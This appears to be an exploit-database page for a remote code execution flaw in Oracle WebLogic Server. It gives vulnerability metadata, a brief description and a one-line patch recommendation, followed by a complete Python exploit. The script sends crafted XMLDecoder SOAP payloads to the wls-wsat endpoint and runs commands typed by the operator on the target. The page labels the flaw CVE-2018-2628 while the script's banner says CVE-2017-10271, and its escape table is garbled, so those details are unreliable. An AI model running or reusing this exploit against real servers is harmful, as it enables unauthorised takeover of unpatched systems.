Remote Code Execution in Oracle WebLogic Server

vendor:

WebLogic Server

by:

Ricardo J. Rodríguez

9,8

CVSS

CRITICAL

Remote Code Execution

CWE

Product Name: WebLogic Server

Affected Version From: 10.3.6.0.0

Affected Version To: 12.2.1.3.0

Patch Exists: YES

Related CWE: CVE-2018-2628

CPE: a:oracle:weblogic_server

Metasploit: https://www.rapid7.com/db/vulnerabilities/oracle-weblogic-cve-2018-2628/

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows, Linux, Mac

2018

Remote Code Execution in Oracle WebLogic Server

This exploit allows an attacker to execute arbitrary commands on a vulnerable Oracle WebLogic Server instance. The vulnerability exists due to the lack of proper input validation in the WebLogic Server's 'CoordinatorPortType' SOAP service. An attacker can exploit this vulnerability by sending a specially crafted SOAP request containing malicious Java code to the vulnerable service. This code will be executed on the server with the privileges of the WebLogic user.

Mitigation:

Oracle has released a patch to address this vulnerability. It is recommended to apply the patch as soon as possible.

Source

Exploit-DB raw data:

import requests
import sys

url_in = sys.argv[1]
payload_url = url_in + "/wls-wsat/CoordinatorPortType"
payload_header = {'content-type': 'text/xml'}


def payload_command (command_in):
    html_escape_table = {
        "&": "&",
        '"': """,
        "'": "&apos;",
        ">": ">",
        "<": "<",
    }
    command_filtered = "<string>"+"".join(html_escape_table.get(c, c) for c in command_in)+"</string>"
    payload_1 = "<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\"> \n" \
                "   <soapenv:Header> " \
                "       <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\"> \n" \
                "           <java version=\"1.8.0_151\" class=\"java.beans.XMLDecoder\"> \n" \
                "               <void class=\"java.lang.ProcessBuilder\"> \n" \
                "                  <array class=\"java.lang.String\" length=\"3\">" \
                "                      <void index = \"0\">                       " \
                "                          <string>cmd</string>                 " \
                "                      </void>                                    " \
                "                      <void index = \"1\">                       " \
                "                          <string>/c</string>                  " \
                "                      </void>                                    " \
                "                      <void index = \"2\">                       " \
                + command_filtered + \
                "                      </void>                                    " \
                "                  </array>" \
                "                  <void method=\"start\"/>" \
                "                  </void>" \
                "            </java>" \
                "        </work:WorkContext>" \
                "   </soapenv:Header>" \
                "   <soapenv:Body/>" \
                "</soapenv:Envelope>"
    return payload_1

def do_post(command_in):
    result = requests.post(payload_url, payload_command(command_in ),headers = payload_header)

    if result.status_code == 500:
        print "Command Executed \n"
    else:
        print "Something Went Wrong \n"



print "***************************************************** \n" \
       "****************   Coded By 1337g  ****************** \n" \
       "*  CVE-2017-10271 Blind Remote Command Execute EXP  * \n" \
       "***************************************************** \n"

while 1:
    command_in = raw_input("Eneter your command here: ")
    if command_in == "exit" : exit(0)
    do_post(command_in)